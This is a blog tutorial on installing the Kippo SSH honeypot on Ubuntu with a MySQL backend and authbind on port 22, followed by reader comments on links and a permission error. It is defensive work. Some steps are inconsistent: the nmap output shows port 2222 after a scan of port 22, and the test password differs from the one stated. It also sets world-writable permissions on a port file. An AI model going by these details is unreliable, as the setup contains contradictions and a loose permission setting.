kippo | medium interaction honeypot | ubuntu

11 Jan

Kippo it is a great medium interaction SSH honeypot designed to log brute force attacks written in python. If you check https://bomber.dyndns.org/kippo_rpts/graphs/index.php  https://zabomber.dyndns.org/kippo_rpts/graphs/index.php, you will see my current honeypot {Jack} who has gathered some real interesting attacks in the past couple months.

In this brief report I will show my experience installing kippo on a ubuntu system.

Previously it’s necessary to install some dependences. It is highly recommended to utilize mysql for the kippo backend. By doing so, you can take advantage of some of the reporting i have configured and it makes it easy to report on all honeypots via one centralised db instance, should you choose to setup a few kippo honeypots and thus create a honeynet. Lastly, I recommend using the svn version vs wget as it is alot simpler to manage upgrades with svn.

$ sudo mkdir /opt/kippo 
$ sudo apt-get install subversion 
$ sudo apt-get install mysql-server 
$ sudo apt-get install python-dev openssl python-openssl python-pyasn1 python-twisted python-mysqldb

Next, we checkout kippo :

$ cd /opt/kippo/ 
$ sudo svn checkout http://kippo.googlecode.com/svn/trunk/ .

Next, we setup a non-root user (and mysql user) for the kippo instance :

$ sudo useradd -s /bin/false -d /home/kippo -m kippo

Next, we setup the mysql kippo database and create a user which we will use in the kippo.cfg file later. Please remember to change secret to what ever password you wish to, we will change this later :

$ mysql -u root -p 
Enter password: 

Welcome to the MySQL monitor. Commands end with ; or \g. 
Your MySQL connection id is 41 Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. 

mysql> CREATE DATABASE kippo; 
Query OK, 
1 row affected (0.00 sec) 

mysql> GRANT ALL ON kippo.* to ‘kippo’@'localhost’ identified by ‘secret’; 
mysql>exit

We than have to import the kippo structure into the mysql database :

cd /opt/kippo/doc/sql/ 
mysql -ukippo -psecret kippo < mysql.sql

Now you can edit the config file kippo.cfg, you can see some options that you can change as you like.

Now in kippo.cfg file we need to uncomment the latest lines and put the correct cofiguration data,

[database_mysql] 
host = localhost 
database = kippo 
username = kippo 
password = secret

We also want to ensure that we get port 22 operational for kippo. Port 22 is the default SSH port and is utilized by 99% of brute force attacks. There are two ways in which to get kippo working on port 22.

One option is to port forward 22 on your firewall to the default port 2222 (located in kippo.cfg).

Or, like me, i want port 22 to be used which requires authbind to be setup :

$ sudo apt-get install authbind

Next with root:

$ touch /etc/authbind/byport/22 
$ chown kippo:kippo /etc/authbind/byport/22 
$ chmod 777 /etc/authbind/byport/22

Now with the kippo’s user change the start.sh from:

twistd -y kippo.tac -l log/kippo.log --pidfile kippo.pid

to:

authbind --deep twistd -y kippo.tac -l log/kippo.log --pidfile kippo.pid

Finished Kippo is running on port 22!!

One last final touch to give the setup application to kippo user :

$ sudo chown -R kippo:kippo /opt/kippo/

Now we can start our honeypot, very important, don’t use root account :

$ sudo su 
root@localhost: su kippo 
$ bash 
kippo@localhost:/opt/kippo/start.sh 
Starting kippo in background...Loading dblog engine: mysql

We check that the ssh honeypot it’s running in my case in port 22:

$ sudo netstat -atnp | grep 22 
tcp 0 0 0.0.0.0:22 0.0.0.0:* ESCUCHAR 3104/python 

If from another computer we try to lunch a nmap scan to 2222 port:

$ nmap -PN -sV -p 22 192.168.1.1

Great, we have our fake ssh server :

Nmap scan report for 192.168.1.1

Host is up (0.00046s latency).

PORT STATE SERVICE VERSION 2222/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0) Service Info: OS: Linux

Now we try to connect with a good pass, which is changeable via kippo.cfg (123456):

$ ssh -l root -p 22 192.168.1.1 Password: sales#

Ok, now in the honeypot machine we check our database with all the ssh connections attemps

$ mysql -u kippo -p 
> use kippo; 
> select * from auth; 

+—-+———————————-+———+———-+———-+—————-+
| id | session | success | username | password | timestamp |
+—-+———————————-+———+———-+———-+—————-+
| 1 | 6eb05042605211e0b00c000c29fc1cf3 | 0 | root | sdfasdf | 2011-04-06 13:33:19 |
| 2 | 6eb05042605211e0b00c000c29fc1cf3 | 0 | root | quit | 2011-04-06 13:34:42 |
| 3 | cfbead06605d11e09cf5000c29fc1cf3 | 0 | root | sdfasdfa | 2011-04-06 14:55:21 |
| 4 | cfbead06605d11e09cf5000c29fc1cf3 | 1 | root | 123456 | 2011-04-06 14:56:46 |
+—-+———————————-+———+———-+———-+—————-+

You can see all the attemps fails and successful. You can explore other interesting data:

> show tables; 

+—————–+
| Tables_in_kippo |
+—————–+
| auth |
| clients |
| input |
| sensors |
| sessions |
| ttylog |
+—————–+
Other interesting files in the kippo instalations,

dl/ – files downloaded with wget are stored here
log/kippo.log – log/debug output
log/tty/ – session logs
utils/playlog.py – utility to replay session logs
utils/createfs.py – used to create fs.pickle
fs.pickle – fake filesystem
honeyfs/ – file contents for the fake filesystem – feel free to copy a real system here

Lastly, there are some really cool 3rd party tools which i use to monitor the stats, display etc.

Check them out here :

Graphs : http://bruteforce.gr/kippo-graph
Ajaxterm : http://www.daveeddy.com/tutorials-scripts/ubuntu/ajaxterm-for-kippo-logs/

That’s it. You now have a medium interaction honeypot to capture attacks on your network.

About these ads

7 Responses to “kippo | medium interaction honeypot | ubuntu”

  1. Ion January 12, 2012 at 12:06 am #

    Hello Darryn. This is Ion from BruteForce.gr. Just to inform you that Kippo-Graph has reached version 0.6.2 (and 0.6.3 will be uploaded soon). You might want to link at http://bruteforce.gr/kippo-graph to always be up to date ;) Thanks for the mention, and I enjoyed your article!

  2. darrynvantonder January 12, 2012 at 11:02 am #

    Hi Ion

    Thanks for the feedback. I have updated my article with the correct link. Awesome work on the graphs!!

    Cheers

  3. Elizabeth June 19, 2012 at 2:50 am #

    thanks for this how-to, it has been very helpful!
    one question though: why did you want the shell of kippo to be bin/bash?

  4. Elizabeth June 19, 2012 at 2:50 am #

    ah! sorry, I mean bin/false! (instead of bin/bash)

  5. darrynvt June 21, 2012 at 6:55 pm #

    Elizabeth: thanks for the response. To answer your question, I haven’t had the time to dig up the script i used to auto start kippo as the ‘kippo’ user, so I used /bin/bash to allow me login as kippo and start it up. I know there is a better way of doing it.

    Care to assist ;)?

  6. things just got real March 18, 2013 at 2:52 pm #

    sudo -u kippo /opt/kippo/start.sh
    Starting kippo in background…Unhandled Error
    Traceback (most recent call last):
    File “/usr/lib/python2.7/dist-packages/twisted/application/app.py”, line 652, in run
    runApp(config)
    File “/usr/lib/python2.7/dist-packages/twisted/scripts/twistd.py”, line 23, in runApp
    _SomeApplicationRunner(config).run()
    File “/usr/lib/python2.7/dist-packages/twisted/application/app.py”, line 386, in run
    self.application = self.createOrGetApplication()
    File “/usr/lib/python2.7/dist-packages/twisted/application/app.py”, line 451, in createOrGetApplication
    application = getApplication(self.config, passphrase)
    — —
    File “/usr/lib/python2.7/dist-packages/twisted/application/app.py”, line 462, in getApplication
    application = service.loadApplication(filename, style, passphrase)
    File “/usr/lib/python2.7/dist-packages/twisted/application/service.py”, line 405, in loadApplication
    application = sob.loadValueFromFile(filename, ‘application’, passphrase)
    File “/usr/lib/python2.7/dist-packages/twisted/persisted/sob.py”, line 203, in loadValueFromFile
    fileObj = open(filename, mode)
    exceptions.IOError: [Errno 13] Permission denied: ‘kippo.tac’

    Any ideas why this error pop-ups, followed all steps from the tutorial.

    • darrynvt April 9, 2013 at 10:00 am #

      What user are you running this as? Kippo? Who own’s the file it’s giving permission errors for?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 55 other followers

%d bloggers like this: